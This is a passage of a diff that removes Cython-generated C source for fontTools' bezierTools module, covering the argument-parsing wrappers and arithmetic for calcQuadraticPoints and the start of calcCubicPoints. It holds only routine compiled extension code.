"fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints(PyObject 
*__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_54calcQuadraticPoints, "calcQuadraticPoints(a, b, c)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_55calcQuadraticPoints = {"calcQuadraticPoints", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_54calcQuadraticPoints}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_55calcQuadraticPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticPoints (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - 
CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, 1); __PYX_ERR(0, 981, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 981, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, 2); __PYX_ERR(0, 981, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticPoints") < 0)) __PYX_ERR(0, 981, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticPoints", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 981, __pyx_L3_error) - __pyx_L6_skip:; - goto 
__pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_y1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticPoints", 1); - - /* "fontTools/misc/bezierTools.py":982 - * - * def calcQuadraticPoints(a, b, c): - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = 
__pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 982, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 982, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 982, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 982, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":983 - * def calcQuadraticPoints(a, b, c): - * ax, ay = a - * bx, by = b # 
<<<<<<<<<<<<<< - * cx, cy = c - * x1 = cx - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 983, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 983, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 983, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 983, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_by = 
__pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":984 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * x1 = cx - * y1 = cy - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 984, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 984, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 984, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - 
__PYX_ERR(0, 984, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":985 - * bx, by = b - * cx, cy = c - * x1 = cx # <<<<<<<<<<<<<< - * y1 = cy - * x2 = (bx * 0.5) + cx - */ - __Pyx_INCREF(__pyx_v_cx); - __pyx_v_x1 = __pyx_v_cx; - - /* "fontTools/misc/bezierTools.py":986 - * cx, cy = c - * x1 = cx - * y1 = cy # <<<<<<<<<<<<<< - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy - */ - __Pyx_INCREF(__pyx_v_cy); - __pyx_v_y1 = __pyx_v_cy; - - /* "fontTools/misc/bezierTools.py":987 - * x1 = cx - * y1 = cy - * x2 = (bx * 0.5) + cx # <<<<<<<<<<<<<< - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_bx, __pyx_float_0_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 987, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 987, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":988 - * y1 = cy - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy # <<<<<<<<<<<<<< - * x3 = ax + bx + cx - * y3 = ay + by + cy - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_by, __pyx_float_0_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 988, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 988, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":989 - * x2 = (bx * 0.5) + cx - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx # <<<<<<<<<<<<<< - * y3 = ay + by + cy - * return (x1, y1), (x2, y2), (x3, y3) - */ - __pyx_t_2 = PyNumber_Add(__pyx_v_ax, __pyx_v_bx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 989, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = 
PyNumber_Add(__pyx_t_2, __pyx_v_cx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 989, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":990 - * y2 = (by * 0.5) + cy - * x3 = ax + bx + cx - * y3 = ay + by + cy # <<<<<<<<<<<<<< - * return (x1, y1), (x2, y2), (x3, y3) - * - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_ay, __pyx_v_by); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 990, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_v_cy); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 990, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_y3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":991 - * x3 = ax + bx + cx - * y3 = ay + by + cy - * return (x1, y1), (x2, y2), (x3, y3) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x1)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y1); - __Pyx_GIVEREF(__pyx_v_y1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y1)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x2)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y2); - __Pyx_GIVEREF(__pyx_v_y2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y2)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x3); - __Pyx_GIVEREF(__pyx_v_x3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x3)) 
__PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y3); - __Pyx_GIVEREF(__pyx_v_y3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_y3)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 991, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1)) __PYX_ERR(0, 991, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 991, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticPoints", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_x1); - __Pyx_XDECREF(__pyx_v_y1); - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject 
*__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_56calcCubicPoints, "calcCubicPoints(a, b, c, d)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_57calcCubicPoints = {"calcCubicPoints", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_56calcCubicPoints}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_57calcCubicPoints(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicPoints (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - 
CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 1); __PYX_ERR(0, 994, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 2); __PYX_ERR(0, 994, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 994, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicPoints", 1, 4, 4, 3); __PYX_ERR(0, 994, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicPoints") < 0)) __PYX_ERR(0, 994, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = 
